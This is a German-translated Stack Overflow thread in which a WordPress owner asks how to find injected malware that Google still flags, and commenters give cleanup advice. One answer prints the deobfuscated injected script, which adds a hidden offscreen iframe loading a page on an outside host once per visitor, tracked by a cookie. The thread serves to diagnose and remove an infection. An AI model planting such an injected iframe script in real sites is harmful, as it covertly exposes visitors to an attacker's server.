So finden Sie bösartigen Code/Malware auf einer Website [closed]

Lesezeit: 4 Minuten

Benutzeravatar von Pectus Excavatum
Trichterbrust

Meine WordPress-Website wurde kürzlich mit Malware infiziert und wurde auf die schwarze Liste gesetzt. Ich dachte, ich hätte es behoben, indem ich die Seite und die Plugins aktualisiert und jeglichen Code entfernt habe, den ich nicht erkannt habe.

Ich habe dann Sucuri Site Checker verwendet und es schien in Ordnung zu sein, also habe ich eine Überprüfungsanfrage bei Google eingereicht. Google hat jedoch gesagt, dass es immer noch Malware in Form von bösartigem Code enthält (sie bezeichneten es als Code-Injektion).

Ich weiß nicht, was ich tun soll. Gibt es eine Möglichkeit, den Code zu finden, den Google findet? Die Domain ist sudorf.co.uk, aber sie enthält Malware, daher würde ich nicht raten, dorthin zu gehen – keine Ahnung, was die Malware tun wird.

Jede Hilfe wäre sehr willkommen.

EDIT: Ich habe diesen Code vor ein paar Tagen gefunden und gelöscht, dann habe ich alle Versionen aktualisiert usw. Aber offensichtlich ist er wieder zurückgekommen. Hat jemand eine Idee, wie es dahin kommen könnte. Meine Gedanken sind, dass es entweder von einem Plugin stammt – weshalb ich sie alle entfernen werde. Das andere ist das Kontaktformular – aber ich dachte nicht, dass es ihnen erlaubt hätte, die header.php zu bearbeiten.

  • Es gibt einen böswilligen Block von <script> gleich nach <body>. Es könnte von mehreren Stellen injiziert werden, Ihre beste Lösung (wie immer bei einer Infektion) ist es, es zu nukleieren und zu einer bekanntermaßen guten Version zurückzukehren. Und sehen Sie sich bewährte Sicherheitspraktiken an – minimieren Sie Dateiberechtigungen, halten Sie sich über neue Versionen auf dem Laufenden, installieren Sie spezielle WordPress-Sicherheits-Plugins … Aber am Ende ist WordPress ein riesiger Skript-Kiddie-Magnet und Sie werden einfach immer wieder angegriffen weil Sie WordPress ausführen.

    – DCoder

    5. September 2013 um 14:14 Uhr


  • Deaktivieren Sie alle Ihre Plugins und kehren Sie zu einem Standarddesign zurück. Lassen Sie dann Google erneut testen. Fügen Sie sie nacheinander hinzu, bis ein Problem gefunden wird. Gibt Google keine weiteren Details (z. B. eine URL) an?

    – Halber

    5. September 2013 um 14:16 Uhr

  • Nein, leider bezogen sich die einzigen Details, die sie gaben, darauf, dass es sich um eine Code-Injektion handelte.

    – Trichterbrust

    5. September 2013 um 14:18 Uhr

  • @PectusExcavatum Plugins, die diesen Mist zu Ihrer Website hinzufügen, sind sehr gut darin, den Beweis zu verbergen, dass das Plugin von vornherein einen Fehler hatte.

    – h2oooooo

    5. September 2013 um 14:33 Uhr

  • Ihre beste Lösung besteht darin, einen erfahrenen Serveradministrator oder Sicherheitsexperten hinzuzuziehen, um festzustellen, wie Ihre Website gehackt wurde. Bis Sie genau wissen, wie der Code auf Ihre Website gelangt ist, können Sie nicht sicher sein, dass er nicht zurückkommt.

    – Engel

    5. September 2013 um 14:46 Uhr

Benutzeravatar von h2ooooooo
h2oooooo

Das ist reine Info. Ihre Malware sieht so aus, wenn sie entschleiert ist:

 function k09() {
     var static="ajax";
     var controller="index.php";
     var k = document.createElement('iframe');

     k.src="http://dostojewskij-gesellschaft.de/VD49Jdzr.php";
     k.style.position = 'absolute';
     k.style.color="512";
     k.style.height="512px";
     k.style.width="512px";
     k.style.left="1000512";
     k.style.top = '1000512';

     if (!document.getElementById('k')) {
         document.write('<p id=\'k\' class=\'k09\' ></p>');
         document.getElementById('k').appendChild(k);
     }
 }

 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', "https://stackoverflow.com/");

         k09();
     }
 }

http://dostojewskij-gesellschaft.de/VD49Jdzr.php gibt einfach “OK” aus.

Wieso den?

Meine Vermutung ist, dass dies ein IP/Traffic-Logger ist. Vielleicht, damit die Hacker überprüfen, welche Blogs am aktivsten sind, und dann später zurückkommen und diese bestimmte Site hacken (keine Notwendigkeit, Zeit auf einer Site mit 2 Besuchern pro Monat zu verschwenden). Das ist gut und schlecht.

Das Gute daran ist, dass es scheint dass sie keine Ihrer Benutzerdatenbanken oder irgendetwas anderes verwendet haben.

Das Schlimme ist, dass sie möglicherweise Ihre gesamte Datenbank heruntergeladen haben, da sie offensichtlich Ausführungsrechte auf Ihrem Server hatten und ihre PHP-Dateien möglicherweise auf Ihrem gesamten Server abgelegt haben. Am besten beginnst du mit einem frischen WP und kopierst Plugins/Themes einzeln hinein, während du sie manuell überprüfst.

Veränderung alle Passwörter. Sogar Ihr DB-Login. In Betracht ziehen alles kompromittiert.

  • Ich werde genau das tun. Danke für deine Hilfe

    – Trichterbrust

    5. September 2013 um 14:49 Uhr

1387000cookie-checkSo finden Sie bösartigen Code/Malware auf einer Website [closed]

This website is using cookies to improve the user-friendliness. You agree by using the website further.

Privacy policy